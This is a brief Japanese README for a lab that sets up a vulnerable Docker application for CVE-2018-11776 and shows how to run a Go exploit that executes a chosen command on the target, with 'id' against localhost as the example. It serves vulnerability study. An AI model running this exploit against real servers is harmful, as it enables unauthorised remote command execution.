
独自のイメージをビルドして実行できます:
docker build . -t your_image_name
docker container run -it --rm -p 8080:8080 your_image_name
または、私が愛情を込めて作成したイメージをプルすることもできます:
docker container run -it --rm -p 8080:8080 tuxotron/cve-2018-11776
ポート8080で実行される脆弱性のあるアプリケーション
エクスプロイトを試すには、システムにGoが必要です。構文は次のとおりです:
exploit-cve-2018-11776 URL COMMAND
たとえば、次のように実行できます:
go run exploit-cve-2018-11776.go http://localhost:8080 "id"
これにより、id コマンドの結果が出力されるはずです。
このエクスプロイトは、このリポジトリにあるPythonで書かれたものをGoに移植したものです。
楽しんでください!